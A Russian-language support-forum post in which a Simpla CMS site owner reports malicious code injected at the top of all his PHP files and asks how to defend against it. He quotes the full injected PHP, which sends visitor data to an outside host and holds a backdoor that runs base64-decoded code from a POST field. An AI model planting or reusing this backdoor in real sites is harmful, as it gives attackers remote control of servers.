Форум поддержки Simpla

Добрый день.

Сегодня утром обнаружил приведенный ниже код во всех php файлах симплы.
Обнаружил это потому, что другой мой сайт (на битриксе) упал из-за этого изменения.

Как я понимаю, кто-то нашел уязвимость, залил в корень сайта скрипт (этот скрипт у меня остался),
который прошелся по всем php - файлам и в начало дописал свой зловред.

Кто может подсказать, как защититься?

Спасибо.
Антон Шишков
www.taleofwar.ru

Вот он, вирусный код:

<?php <br />global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo ""; echo "<!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }<br />
дальше уже симпловый код.